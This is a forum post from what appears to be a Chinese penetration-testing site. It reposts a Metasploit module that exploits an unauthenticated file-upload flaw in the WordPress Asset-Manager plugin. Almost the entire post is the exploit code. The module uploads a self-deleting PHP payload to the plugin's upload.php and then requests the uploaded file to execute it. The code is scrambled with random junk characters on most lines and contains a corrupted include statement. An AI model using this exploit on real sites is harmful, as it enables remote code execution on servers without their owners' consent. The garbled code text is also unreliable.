中国网络渗透测试联盟

标题: WordPress Asset-Manager PHP文件上传漏洞 [打印本页]

作者: admin    时间: 2012-12-31 09:22
标题: WordPress Asset-Manager PHP文件上传漏洞
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
  q% t6 C0 U% o
8 ^) e+ ^, c. r$ L& [##
$ ?) `$ C/ Q5 b$ [& l# This file is part of the Metasploit Framework and may be subject to: E( N& ]* |  I- P# h% o- X3 ?
# redistribution and commercial restrictions. Please see the Metasploit
! f) T3 d* i2 j# Framework web site for more information on licensing and terms of use.
% Q& `+ \3 q0 O; |  v8 T0 w( ?#   http://metasploit.com/framework/7 V- I! Z$ w4 j- l
##6 X' R  N+ }* q0 U

, e% ]. R% b: v" U% Krequire 'msf/core'4 Z  @. s/ Q2 X/ n" V! D/ n& G
require 'msf/core/exploit/php_exe'2 x- o6 b5 H: |

- E% z) Y6 Z* V3 O' G/ Hclass Metasploit3 < Msf::Exploit::Remote9 N5 U/ O/ f! B; |  ^
  Rank = ExcellentRanking+ V( F$ U4 F/ s* i; ^: ]

7 w( r- m  v9 r6 e  include Msf::Exploit::Remote::HttpClient4 b1 t- Z5 K0 Y" V  f0 I- H+ w' @! w
  include Msf::Exploit:hpEXE/ j, J) h2 L9 O7 O2 e
6 p. R; _8 |- L0 ~$ y
  def initialize(info = {})$ |( E" [3 F  k5 S& K6 B
    super(update_info(info,6 |+ h* M3 S! a$ Y/ M. W! i6 @
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
. T0 y. e2 k! S  F/ l# E      'Description'    => %q{
" f0 B( {+ ]4 X% W. V        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
/ f/ C7 E, y( A( \        plugin.  By abusing the upload.php file, a malicious user can upload a file to a& T" n* a0 L! n" x8 t
        temp directory without authentication, which results in arbitrary code execution.
$ x% v$ x4 x4 f5 f5 Q. {; j      },
& ~4 O! w* |& Z4 I' ^0 s8 U      'Author'         =>
: e! J; g4 J. c        [, m3 e% R& }& }6 O
          'Sammy FORGIT', # initial discovery! f& v( P3 `" K* p
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module5 m* R- P1 l% I! `+ g
        ],; [* C+ O9 |; g
      'License'        => MSF_LICENSE,2 r' K: Z& \; X' h' w1 i
      'References'     =>" a0 f# u: X7 j1 U, a6 ?3 b
        [. @9 M# M0 `& \  ^. w
          [ 'OSVDB', '82653' ],  U6 f/ r' ]6 o7 q
          [ 'BID', '53809' ],8 l1 F# X) J, e& v) Y- T
          [ 'EDB', '18993' ],
6 S  D, J$ W; s          [ 'URL', 'http:// www.myhack58.com /' ]- b+ a# \" V, |$ g3 B# q' ?1 g
        ],
/ p* J$ ?/ C5 W, ?& |9 n      'Payload'       =>
1 _' Z% z4 q+ V        {  X* k0 ], _+ Y4 Y
          'BadChars' => "\x00",
% C& a1 |3 k  |% D0 c8 w* n1 M. s% s        },
+ ^  L. r/ J/ m5 u. }* S& Y3 k      'Platform'       => 'php',
0 s  S7 x. }6 E# f! ^. {+ V      'Arch'           => ARCH_PHP," |7 y- P. C' j5 j) V- _" J' H
      'Targets'        =>
% g6 S1 b3 }: [        [( w6 O; y* l* j' ?" I0 v% F% t
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
, W6 y. O; d2 ]" B% U( j5 R9 I          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
  ~, E: K1 k2 g$ C0 |        ],
/ j/ s: u( y7 L( B1 \      'DefaultTarget' => 0,; |1 I/ P/ E8 f9 U' K; w
      'DisclosureDate' => 'May 26 2012'))- c: b2 L, ?1 K

2 B. y, i* o1 J8 z/ q8 \' E    register_options(
& |* x  [  b. |7 k7 m      [
' e. N7 |+ w, l- D, z2 f4 s        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])# Z, Z5 y- n* o% ]# u& R- Z
      ], self.class)% O3 i, {9 L/ G  Q6 r( C
  end
! W. _3 J1 G, w( i, ^+ h& V+ Z
$ }! ?+ `; J4 s8 D5 m7 C/ L  def exploit0 M3 N- C- j) A8 f2 V* Q) U2 x
    uri =  target_uri.path
8 a8 y# ^4 E- k1 [0 X    uri << '/' if uri[-1,1] != '/'
9 T9 u5 E3 i( m    peer = "#{rhost}:#{rport}"/ D) V6 B# d' E2 [  ~
    payload_name = "#{rand_text_alpha(5)}.php"
* f" C1 ]4 {5 w3 g5 {. \    php_payload = get_write_exec_payload(:unlink_self=>true)# J/ c- k1 A% e* c% P& f5 x& f2 h

: C6 c/ @$ H. W/ x0 D9 H    data = Rex::MIME::Message.new+ g1 m% V1 X# b5 l6 j. d! ^1 ^
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")6 r4 ]6 `+ i/ F0 Q! \# O% T
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')  f/ W8 H# n# l8 c/ I

& X3 g  D& V9 q" g    print_status("#{peer} - Uploading payload #{payload_name}")9 C, b  @* j: d4 \: |; P' I! N
    res = send_request_cgi({
. U1 z; O9 I% w1 V/ Y7 I( G, I- H      'method'  => 'POST',5 C1 ?9 ?* z8 e* P% d
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",% n0 |6 u6 u3 E9 }
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
5 V6 \% G; d+ M& r+ O0 C5 H      'data'    => post_data
8 B2 g) I4 r8 S8 ]5 t( r2 x/ q    })2 P4 s/ q3 n/ w8 g: A9 t

) K7 x% _) q. z9 L- ^& u: X    if not res or res.code != 200 or res.body !~ /#{payload_name}/6 @1 G7 Z. b8 n. q# ~5 P7 l
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")' r9 A% ~$ T9 ?2 J# I
end
+ Q+ D' |, Z3 a9 P3 ]( l 4 l0 ~7 T& ?  I7 T" x
    print_status("#{peer} - Executing payload #{payload_name}"); O5 l! E9 S/ H
    res = send_request_raw({
  p" C) _/ v- [* b: _8 q2 F      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",: \7 K% i3 g: b
      'method'  => 'GET'
" Z: R' I/ _* S1 i1 b( Z* k    })
* b* T. Y. o, ~- @ * x& H' v" [, e' i/ G7 K
    if res and res.code != 200
! l6 C& B$ e7 o3 P+ U      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
  m) Z: b8 R& |    end
" k) x3 q% J2 X0 i  end
) s7 g  k7 D, P! C9 j  Bend5 R; l3 b3 o5 Z3 w* ^* U- M





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2